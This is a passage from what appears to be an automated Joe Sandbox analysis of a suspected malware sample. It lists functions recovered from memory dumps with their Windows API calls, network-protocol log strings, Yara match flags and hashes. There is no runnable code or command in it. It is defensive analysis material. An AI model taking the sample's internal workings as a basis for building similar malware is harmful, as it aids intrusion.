                                                                                                  • HeapCreate.KERNEL32(?,?,?,?,00000000,02D04039,?,76F8DFA0,02D03648), ref: 02D040D4
                                                                                                  • SetEvent.KERNEL32(?,?,00000000,02D04039,?,76F8DFA0,02D03648), ref: 02D04150
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000,02D04039,?,76F8DFA0,02D03648), ref: 02D04157
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1219087420-0
                                                                                                  • Opcode ID: cad0a95d1ef60a3da59276dece35a5525002768d6c4a4ad6dab07df7364b4e9a
                                                                                                  • Instruction ID: a91e790f62a304a51b29a78d29c348de201780a659cc9bb5b27c28f6087a8ac6
                                                                                                  • Opcode Fuzzy Hash: cad0a95d1ef60a3da59276dece35a5525002768d6c4a4ad6dab07df7364b4e9a
                                                                                                  • Instruction Fuzzy Hash: 7B314870600A02AFD705DB34D898B96F7A9FF48310F148649E5298B3A0CB35BD25CFE0
                                                                                                  Function 00974060 Relevance: 12.1, APIs: 8, Instructions: 78memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000000,00974039,?,76F8DFA0,00973648), ref: 00974074
                                                                                                  • ResetEvent.KERNEL32(?,?,00000000,00974039,?,76F8DFA0,00973648), ref: 00974087
                                                                                                  • ResetEvent.KERNEL32(?,?,00000000,00974039,?,76F8DFA0,00973648), ref: 00974090
                                                                                                  • ResetEvent.KERNEL32(?,?,00000000,00974039,?,76F8DFA0,00973648), ref: 00974099
                                                                                                    • Part of subcall function 00971350: HeapFree.KERNEL32(?,00000000,?,?,?,009740A6,?,00000000,00974039,?,76F8DFA0,00973648), ref: 00971390
                                                                                                    • Part of subcall function 00971420: HeapFree.KERNEL32(?,00000000,?,?,?,009740B1,?,00000000,00974039,?,76F8DFA0,00973648), ref: 0097143D
                                                                                                    • Part of subcall function 00971420: _free.LIBCMT ref: 00971459
                                                                                                  • HeapDestroy.KERNEL32(?,?,00000000,00974039,?,76F8DFA0,00973648), ref: 009740B9
                                                                                                  • HeapCreate.KERNEL32(?,?,?,?,00000000,00974039,?,76F8DFA0,00973648), ref: 009740D4
                                                                                                  • SetEvent.KERNEL32(?,?,00000000,00974039,?,76F8DFA0,00973648), ref: 00974150
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000,00974039,?,76F8DFA0,00973648), ref: 00974157
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1219087420-0
                                                                                                  • Opcode ID: 42140521eb1b244646a8d0ccc883df17b844c60aee2d3c7402033c0517f1166f
                                                                                                  • Instruction ID: 85bfc01b4d3b2e7b890c30d730684d4bb2359703c7dea9dec6b70a1e13c01566
                                                                                                  • Opcode Fuzzy Hash: 42140521eb1b244646a8d0ccc883df17b844c60aee2d3c7402033c0517f1166f
                                                                                                  • Instruction Fuzzy Hash: 30312671614A02AFD705DF38C898BA6F7A8FF48310F158259E42D8B261DB35B855DFD0
                                                                                                  Function 0282B62F Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 351COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$_malloc
                                                                                                  • String ID: ($6$gfff$gfff
                                                                                                  • API String ID: 3506388080-713438465
                                                                                                  • Opcode ID: 33456ebb2468a608b7ebcfb11b4406d8d4d11a59d9dc549158e7697d941f46b7
                                                                                                  • Instruction ID: 3b5d835bd765d56e6cf592d1355397787fe4e8827e522cd677ff564502ff9744
                                                                                                  • Opcode Fuzzy Hash: 33456ebb2468a608b7ebcfb11b4406d8d4d11a59d9dc549158e7697d941f46b7
                                                                                                  • Instruction Fuzzy Hash: ADD16AB9D01318AFDB10EFE9D885A9EBBB9FF48300F104129E505EB251D770A949CF91
                                                                                                  Function 03FAFF2B Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 351COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$_malloc
                                                                                                  • String ID: ($6$gfff$gfff
                                                                                                  • API String ID: 3506388080-713438465
                                                                                                  • Opcode ID: 33456ebb2468a608b7ebcfb11b4406d8d4d11a59d9dc549158e7697d941f46b7
                                                                                                  • Instruction ID: f1f5f5a20108470a257b35bad09484f01d2ff920e3e4cd1f1889138f2820129a
                                                                                                  • Opcode Fuzzy Hash: 33456ebb2468a608b7ebcfb11b4406d8d4d11a59d9dc549158e7697d941f46b7
                                                                                                  • Instruction Fuzzy Hash: 75D16AB5E00318AFDB14DFE6DC85A9EFBB9FF48300F104529E905AB250D774A906CB91
                                                                                                  Function 02D02140 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 303COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 02D01610: __vswprintf.LIBCMT ref: 02D01646
                                                                                                  • _malloc.LIBCMT ref: 02D02330
                                                                                                    • Part of subcall function 02D0F673: __FF_MSGBANNER.LIBCMT ref: 02D0F68C
                                                                                                    • Part of subcall function 02D0F673: __NMSG_WRITE.LIBCMT ref: 02D0F693
                                                                                                    • Part of subcall function 02D0F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76), ref: 02D0F6B8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap__vswprintf_malloc
                                                                                                  • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                                                                                  • API String ID: 3723585974-868042568
                                                                                                  • Opcode ID: 6356dffafb28c0114e622ca34e3ac6bfcf9b9770fd0b49f102fa3d41998e0e56
                                                                                                  • Instruction ID: ec5a8dfb876663898902a428f67b2effb32721c6659c993a5435761ab75e96fe
                                                                                                  • Opcode Fuzzy Hash: 6356dffafb28c0114e622ca34e3ac6bfcf9b9770fd0b49f102fa3d41998e0e56
                                                                                                  • Instruction Fuzzy Hash: 43B19271A012058BCF18CF68D8C87AA77A6FF48314F0845AEED499B3A6D771DD45CBA0
                                                                                                  Function 00972140 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 303COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00971610: __vswprintf.LIBCMT ref: 00971646
                                                                                                  • _malloc.LIBCMT ref: 00972330
                                                                                                    • Part of subcall function 00976E83: __FF_MSGBANNER.LIBCMT ref: 00976E9C
                                                                                                    • Part of subcall function 00976E83: __NMSG_WRITE.LIBCMT ref: 00976EA3
                                                                                                    • Part of subcall function 00976E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F), ref: 00976EC8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap__vswprintf_malloc
                                                                                                  • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                                                                                  • API String ID: 3723585974-868042568
                                                                                                  • Opcode ID: f5680d2ab234ec779fb3ecac2229216d6ea76308415cf92665d41f39d30a22da
                                                                                                  • Instruction ID: 0cfcfed7bb3131a6f385dc3f8bbff999d4a344bb2f16ab5b6d14b7c858e1b750
                                                                                                  • Opcode Fuzzy Hash: f5680d2ab234ec779fb3ecac2229216d6ea76308415cf92665d41f39d30a22da
                                                                                                  • Instruction Fuzzy Hash: F7B1B072A142058BCF18DF68C8816AA7BA5BF84310F18C6AEED5D9B34AD735DD41CB90
                                                                                                  Function 0282980F Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 302COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$_malloc_memcpy_s
                                                                                                  • String ID: &
                                                                                                  • API String ID: 3027343870-3042966939
                                                                                                  • Opcode ID: bc8e6e112c061139a9596f3240d429f853c34e8cae2830de5eda6c03f43a5e61
                                                                                                  • Instruction ID: c27699e32ece3fd41e4f4617ab250bfeeb5a6d9de215913b2eddef09985ce8d8
                                                                                                  • Opcode Fuzzy Hash: bc8e6e112c061139a9596f3240d429f853c34e8cae2830de5eda6c03f43a5e61
                                                                                                  • Instruction Fuzzy Hash: 24C160F9A002299BDB24CF55CCC0BAAB7B5EB48304F1085A9D60DE7241D734AAC9CF65
                                                                                                  Function 03FAE10B Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 302COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$_malloc_memcpy_s
                                                                                                  • String ID: &
                                                                                                  • API String ID: 3027343870-3042966939
                                                                                                  • Opcode ID: bc8e6e112c061139a9596f3240d429f853c34e8cae2830de5eda6c03f43a5e61
                                                                                                  • Instruction ID: b8d6860581260cab3622db445917d2541ce4eeb66d6f251d09a6e3c457273b5d
                                                                                                  • Opcode Fuzzy Hash: bc8e6e112c061139a9596f3240d429f853c34e8cae2830de5eda6c03f43a5e61
                                                                                                  • Instruction Fuzzy Hash: F1C161F5A006199FDB20CF59CCC0BAAB7B9FF58304F1485ADE609A7201D774AA85CF64
                                                                                                  Function 00921807 Relevance: 10.7, APIs: 7, Instructions: 152COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free
                                                                                                  • String ID:
                                                                                                  • API String ID: 269201875-0
                                                                                                  • Opcode ID: 6beac5a88b0ea45cad91d564d56e12dc9c07d13e28084cda825bb388b8fc93ec
                                                                                                  • Instruction ID: abdcb4ea0625071b2abb29542a26e7761b3376ec9e834201dfd3bc615de3cfd1
                                                                                                  • Opcode Fuzzy Hash: 6beac5a88b0ea45cad91d564d56e12dc9c07d13e28084cda825bb388b8fc93ec
                                                                                                  • Instruction Fuzzy Hash: F6516E7AA00121DFD714DF58E4C0969BBB6FF9930872A80ADD50A5B325C732AD62CBD1
                                                                                                  Function 028211EF Relevance: 10.7, APIs: 7, Instructions: 152COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free
                                                                                                  • String ID:
                                                                                                  • API String ID: 269201875-0
                                                                                                  • Opcode ID: e6d8705c8b2e074a591befd5bcc494b5e10d3bbe54f6e4032036311d5e0cbfeb
                                                                                                  • Instruction ID: 634943709e148f1a5f3721b32bcac08ad0f3db820ae8247e788b6e6f767f2ba2
                                                                                                  • Opcode Fuzzy Hash: e6d8705c8b2e074a591befd5bcc494b5e10d3bbe54f6e4032036311d5e0cbfeb
                                                                                                  • Instruction Fuzzy Hash: C8515FBE6001249FDB10DF48C5C88A5BBA6FF49208B2980A9D51DDB762C731BD86CF91
                                                                                                  Function 02D01830 Relevance: 10.7, APIs: 7, Instructions: 152COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _free.LIBCMT ref: 02D01878
                                                                                                  • _free.LIBCMT ref: 02D018B6
                                                                                                  • _free.LIBCMT ref: 02D018F5
                                                                                                  • _free.LIBCMT ref: 02D01935
                                                                                                  • _free.LIBCMT ref: 02D0195D
                                                                                                  • _free.LIBCMT ref: 02D01981
                                                                                                  • _free.LIBCMT ref: 02D019B9
                                                                                                    • Part of subcall function 02D0F639: RtlFreeHeap.NTDLL(00000000,00000000,?,02D13E4C,00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76), ref: 02D0F64F
                                                                                                    • Part of subcall function 02D0F639: GetLastError.KERNEL32(00000000,?,02D13E4C,00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76,00000000), ref: 02D0F661
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 776569668-0
                                                                                                  • Opcode ID: 874472731739e3ed89bd9027d864eadd54a143ebf7ad1ba4de8c5f14ab0f1c91
                                                                                                  • Instruction ID: f4ed7e12ecc5dd3dbc7b8f8031072183bb6c494600b263d983b3b01f7c205de1
                                                                                                  • Opcode Fuzzy Hash: 874472731739e3ed89bd9027d864eadd54a143ebf7ad1ba4de8c5f14ab0f1c91
                                                                                                  • Instruction Fuzzy Hash: 83513B72A001119FC714DF58D1C4AA9BBA6FF89318B2980ADC51E5B371C732ED42CF91
                                                                                                  Function 00971830 Relevance: 10.7, APIs: 7, Instructions: 152COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _free.LIBCMT ref: 00971878
                                                                                                  • _free.LIBCMT ref: 009718B6
                                                                                                  • _free.LIBCMT ref: 009718F5
                                                                                                  • _free.LIBCMT ref: 00971935
                                                                                                  • _free.LIBCMT ref: 0097195D
                                                                                                  • _free.LIBCMT ref: 00971981
                                                                                                  • _free.LIBCMT ref: 009719B9
                                                                                                    • Part of subcall function 00976E49: HeapFree.KERNEL32(00000000,00000000,?,00979900,00000000,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F), ref: 00976E5F
                                                                                                    • Part of subcall function 00976E49: GetLastError.KERNEL32(00000000,?,00979900,00000000,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F,00000000), ref: 00976E71
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 776569668-0
                                                                                                  • Opcode ID: bc88d20cc0f6977429a445edd6403ff27e90aaee80417dd20fad3f46b14158fb
                                                                                                  • Instruction ID: 7ff8c25c22d584970c88f32d4c47401b00288a0f1dc3a1db93848ab114875355
                                                                                                  • Opcode Fuzzy Hash: bc88d20cc0f6977429a445edd6403ff27e90aaee80417dd20fad3f46b14158fb
                                                                                                  • Instruction Fuzzy Hash: 14513CB7A00211CFD714DF5CD490969BBBABF89314729C0ADD64EAB321C732AD52CB91
                                                                                                  Function 03FA5AEB Relevance: 10.7, APIs: 7, Instructions: 152COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free
                                                                                                  • String ID:
                                                                                                  • API String ID: 269201875-0
                                                                                                  • Opcode ID: e6d8705c8b2e074a591befd5bcc494b5e10d3bbe54f6e4032036311d5e0cbfeb
                                                                                                  • Instruction ID: b5a975afd8566387c422b775a2d2fe01bbad9db703a14a8822303b04e8b8b930
                                                                                                  • Opcode Fuzzy Hash: e6d8705c8b2e074a591befd5bcc494b5e10d3bbe54f6e4032036311d5e0cbfeb
                                                                                                  • Instruction Fuzzy Hash: 82515BB6A006158FD714DF1CC5C08A9FBF6BF8A35471A80AAC64E5F321C732AC06CB91
                                                                                                  Function 02D03870 Relevance: 10.6, APIs: 7, Instructions: 149threadnetworktimeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02D03883
                                                                                                  • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 02D038C4
                                                                                                  • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 02D03931
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02D0395C
                                                                                                  • GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 02D039F4
                                                                                                  • SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 02D03A22
                                                                                                  • WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 02D03A39
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
                                                                                                  • String ID:
                                                                                                  • API String ID: 3058130114-0
                                                                                                  • Opcode ID: de71ac5ef7f7e253a5b35e71380481dd066bca75754425ea5e6991937387e296
                                                                                                  • Instruction ID: 1ccce3da4e03601eb6df49870f131bfcd57e7852aadf4abe8542a4fe467ae376
                                                                                                  • Opcode Fuzzy Hash: de71ac5ef7f7e253a5b35e71380481dd066bca75754425ea5e6991937387e296
                                                                                                  • Instruction Fuzzy Hash: 7151AA70A007009BDBA09F29E9C4BAAB7E5FF04714F10495AED9A977E0EB31ED40CB51
                                                                                                  Function 00973870 Relevance: 10.6, APIs: 7, Instructions: 149threadnetworktimeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00973883
                                                                                                  • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 009738C4
                                                                                                  • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 00973931
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0097395C
                                                                                                  • GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 009739F4
                                                                                                  • SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 00973A22
                                                                                                  • WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 00973A39
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
                                                                                                  • String ID:
                                                                                                  • API String ID: 3058130114-0
                                                                                                  • Opcode ID: e01fde8b771e6154370e0c88514f3ec5c9f85b9d0321c3dbddcdda513cb2a0fd
                                                                                                  • Instruction ID: 400aa948f3537d4c166c7f2c72b5339eb189dae8186cd5d9bf3af35796400cdb
                                                                                                  • Opcode Fuzzy Hash: e01fde8b771e6154370e0c88514f3ec5c9f85b9d0321c3dbddcdda513cb2a0fd
                                                                                                  • Instruction Fuzzy Hash: 1051A372604701DBD7209F24C985BAAB7E8BF44714F10C519EA9ED7780EB74FA40EB51
                                                                                                  Function 02D0E6B0 Relevance: 10.5, APIs: 7, Instructions: 44filesynchronizationstringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,02D0E815,?,?,?,?,76F923A0,00000000), ref: 02D0E6BD
                                                                                                  • CreateFileW.KERNEL32(02D30D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,02D0E815,?,?,?,?,76F923A0,00000000), ref: 02D0E6D7
                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 02D0E6F2
                                                                                                  • lstrlenW.KERNEL32(?,00000000,00000000), ref: 02D0E6FF
                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000), ref: 02D0E70A
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02D0E711
                                                                                                  • ReleaseMutex.KERNEL32(00000000), ref: 02D0E71E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseCreateHandleMutexObjectPointerReleaseSingleWaitWritelstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 4202892810-0
                                                                                                  • Opcode ID: cf4592dea16ef979bcc8e31df3777677be9c2b45f352218744424e72141efd5e
                                                                                                  • Instruction ID: c9e591bb775b686bdaadb7255d973898af0d4048c8830fade9ced8bb7d34b95a
                                                                                                  • Opcode Fuzzy Hash: cf4592dea16ef979bcc8e31df3777677be9c2b45f352218744424e72141efd5e
                                                                                                  • Instruction Fuzzy Hash: 3F018171AC1210BBE3345BA4EC4FF5A3768EB49B25F614A04FB15A63C0D6A16C248665
                                                                                                  Function 02D13D2E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,02D26318,00000008,02D13E36,00000000,00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C), ref: 02D13D3F
                                                                                                  • __lock.LIBCMT ref: 02D13D73
                                                                                                    • Part of subcall function 02D18E5B: __mtinitlocknum.LIBCMT ref: 02D18E71
                                                                                                    • Part of subcall function 02D18E5B: __amsg_exit.LIBCMT ref: 02D18E7D
                                                                                                    • Part of subcall function 02D18E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,02D13F06,0000000D,02D26340,00000008,02D13FFF,00000000,?,02D110F0,00000000,02D26278,00000008,02D11155,?), ref: 02D18E85
                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 02D13D80
                                                                                                  • __lock.LIBCMT ref: 02D13D94
                                                                                                  • ___addlocaleref.LIBCMT ref: 02D13DB2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                  • String ID: KERNEL32.DLL
                                                                                                  • API String ID: 637971194-2576044830
                                                                                                  • Opcode ID: 3396b14031d31d2122c26f53994c45e9dbabe40eb77878f3e61cbc7e8ef6dcb3
